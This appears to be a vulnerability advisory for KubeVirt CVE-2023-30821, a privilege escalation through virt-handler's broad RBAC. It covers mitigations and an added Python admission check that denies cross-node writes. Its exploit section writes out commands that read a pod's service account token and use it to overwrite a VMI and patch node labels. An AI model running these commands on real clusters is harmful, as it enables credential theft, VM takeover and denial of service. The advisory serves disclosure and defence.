KubeVirt, Privilege Escalation, CVE-2023-30821 (Critical)


A compromised virt-handler service account can abuse its overly broad Kubernetes RBAC permissions to manipulate node labels and VirtualMachineInstance (VMI) objects cluster-wide. By patching the `kubevirt.io/schedulable` label of every other node to false, an attacker marks those nodes unschedulable for VMI workloads. At the same time the attacker can write bogus data into a running VMI, for example changing its `kubevirt.io/nodeName` label, which drives the VMI into a terminal (failed) state. When an administrator restarts the failed VMI, the scheduler has only one node left that still accepts VMIs: the one the attacker controls. The attack relies on virt-handler's default permissions to update VMIs in any namespace and to patch any node; nothing ties a virt-handler's writes to the node it actually runs on, because KubeVirt's NodeRestriction-style admission check is not enabled by default.
Platform: KubeVirt
Version: Pre-1.0
Vulnerability: Privilege Escalation
Severity: Critical
Date: 2023-03-23

Prediction: 2023-05-15

What Undercode Say:

# 1. Find the virt-handler pod on the node you control (here the minikube node minikube-m03).
kubectl get pods -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler

# 2. Read its projected service account token. No -it: a TTY would append a carriage return to the token.
token=$(kubectl exec virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 3. Overwrite a VMI in another namespace with that token. testvm.json is the VMI's current JSON with its
#    kubevirt.io/nodeName label changed; the mismatch drives the VMI to a terminal state.
curl -k https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm \
  -X PUT -d @testvm.json -H "Content-Type: application/json" -H "Authorization: Bearer $token"

# 4. Mark every node other than the attacker's (minikube-m02 here as an example) unschedulable for VMIs;
#    repeat per node. Only minikube-m03 keeps kubevirt.io/schedulable=true, so the restarted VMI lands there.
curl -k https://192.168.49.2:8443/api/v1/nodes/minikube-m02 -X PATCH \
  -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" \
  --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}'

How Exploit:

Compromise a virt-handler pod (virt-handler runs as a DaemonSet, one pod per node).

Extract its projected service account token.

Modify the target VMI's kubevirt.io/nodeName label so the VMI fails.

Patch kubevirt.io/schedulable=false onto every node except the compromised one.

Wait for (or trigger) a VMI restart; it can only be scheduled onto the attacker's node.

Protection from this CVE:

Enable KubeVirt's NodeRestriction admission check (the NodeRestriction feature gate in releases that include the fix), so a virt-handler can only modify VMIs and node labels that belong to its own node.

Limit virt-handler RBAC: cluster-wide update on VMIs and patch on nodes is far more than a per-node agent needs.

Use dedicated service accounts per KubeVirt component, and bound (projected) tokens so a caller can be attributed to its pod and node.

Apply validating admission policies (CEL ValidatingAdmissionPolicy or a webhook) that reject virt-handler writes targeting nodes or VMIs other than the caller's own node.
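The following is an added example, not code from the page or from KubeVirt: it models the node-restriction decision that the mitigations above describe, and replays the exploit steps against it. A virt-handler running on node X may patch only node X and may update only VMIs placed on X. The same function serves prevention (fed AdmissionReview requests) and detection (fed API audit events), since both carry the user info, kind and object name. Assumptions not taken from the page: the service account is `system:serviceaccount:kubevirt:kubevirt-handler`, and the caller's node is read from the bound token's `authentication.kubernetes.io/node-name` extra claim; the sample requests are constructed for the example.

```python
# Added example (not KubeVirt's or the page's own code): a NodeRestriction-style
# check for writes made with the virt-handler service account.
# Assumptions (not from the page):
#   - the service account is system:serviceaccount:kubevirt:kubevirt-handler
#   - the caller's node comes from the bound token's
#     authentication.kubernetes.io/node-name extra claim; without it we deny.
from typing import Optional, Tuple

VIRT_HANDLER_SA = "system:serviceaccount:kubevirt:kubevirt-handler"
NODE_NAME_EXTRA = "authentication.kubernetes.io/node-name"
NODE_LABEL = "kubevirt.io/nodeName"


def caller_node(user_info: dict) -> Optional[str]:
    """Node the calling virt-handler runs on, or None if not attributable."""
    values = user_info.get("extra", {}).get(NODE_NAME_EXTRA, [])
    return values[0] if values else None


def vmi_node(obj: dict) -> Optional[str]:
    """Node a VMI is placed on: the kubevirt.io/nodeName label, else status.nodeName."""
    label = obj.get("metadata", {}).get("labels", {}).get(NODE_LABEL)
    return label or obj.get("status", {}).get("nodeName")


def decide(req: dict) -> Tuple[bool, str]:
    """Allow/deny a write request whose shape mirrors AdmissionReview.request."""
    if req["userInfo"].get("username") != VIRT_HANDLER_SA:
        return True, "not virt-handler; policy does not apply"
    node = caller_node(req["userInfo"])
    if node is None:
        return False, "virt-handler token is not bound to a node"
    kind = req["kind"]["kind"]
    if kind == "Node":
        if req["name"] != node:
            return False, f"virt-handler on {node} may not modify node {req['name']}"
        return True, "own node"
    if kind == "VirtualMachineInstance":
        old = vmi_node(req.get("oldObject") or {})   # None on CREATE -> denied
        new = vmi_node(req.get("object") or {})
        if old != node:
            return False, f"VMI {req['name']} is on {old}, not on caller node {node}"
        if new != node:
            return False, f"virt-handler on {node} may not move VMI {req['name']} to {new}"
        return True, "own VMI"
    return True, "kind not restricted"


# --- constructed sample requests replaying the attack from a virt-handler on minikube-m03 ---
def handler_request(handler_node, kind, name, operation, obj=None, old=None) -> dict:
    extra = {NODE_NAME_EXTRA: [handler_node]} if handler_node else {}
    return {
        "userInfo": {"username": VIRT_HANDLER_SA, "extra": extra},
        "kind": {"group": "" if kind == "Node" else "kubevirt.io", "kind": kind},
        "operation": operation, "name": name, "object": obj, "oldObject": old,
    }


def vmi(name: str, node: str) -> dict:
    return {"metadata": {"name": name, "labels": {NODE_LABEL: node}}, "status": {"nodeName": node}}


def node_patch(name: str) -> dict:
    return {"metadata": {"name": name, "labels": {"kubevirt.io/schedulable": "false"}}}


SAMPLES = {
    # step "patch node schedulable labels": another node vs. the attacker's own node
    "patch_other_node": handler_request("minikube-m03", "Node", "minikube-m02", "PATCH", obj=node_patch("minikube-m02")),
    "patch_own_node": handler_request("minikube-m03", "Node", "minikube-m03", "PATCH", obj=node_patch("minikube-m03")),
    # step "modify VMI nodeName label": testvm runs on minikube-m02, attacker relabels it to m03
    "relabel_foreign_vmi": handler_request("minikube-m03", "VirtualMachineInstance", "testvm", "UPDATE",
                                           obj=vmi("testvm", "minikube-m03"), old=vmi("testvm", "minikube-m02")),
    # own VMI pushed away to another node, and a legitimate status update on an own VMI
    "move_own_vmi_away": handler_request("minikube-m03", "VirtualMachineInstance", "testvm", "UPDATE",
                                         obj=vmi("testvm", "minikube-m02"), old=vmi("testvm", "minikube-m03")),
    "own_vmi_update": handler_request("minikube-m03", "VirtualMachineInstance", "testvm", "UPDATE",
                                      obj=vmi("testvm", "minikube-m03"), old=vmi("testvm", "minikube-m03")),
    # legacy token with no node binding cannot be attributed
    "unbound_token": handler_request(None, "Node", "minikube-m03", "PATCH", obj=node_patch("minikube-m03")),
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        allowed, reason = decide(req)
        print(f"{label:22s} {'ALLOW' if allowed else 'DENY':5s} {reason}")
```

Two design points: denying when the token carries no node claim is deliberate, because a virt-handler whose node cannot be established is exactly the situation the attack exploits (a webhook could instead look the pod up by name and use its spec.nodeName); and the VMI rule checks both the old and the new placement, so a handler can neither touch a VMI on another node nor hand one of its own VMIs to another node, which is the relabel step of the exploit.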

Impact:

Cluster-wide VM takeover.

Privilege escalation.

Denial of service.


Sources:

Reported By: github.com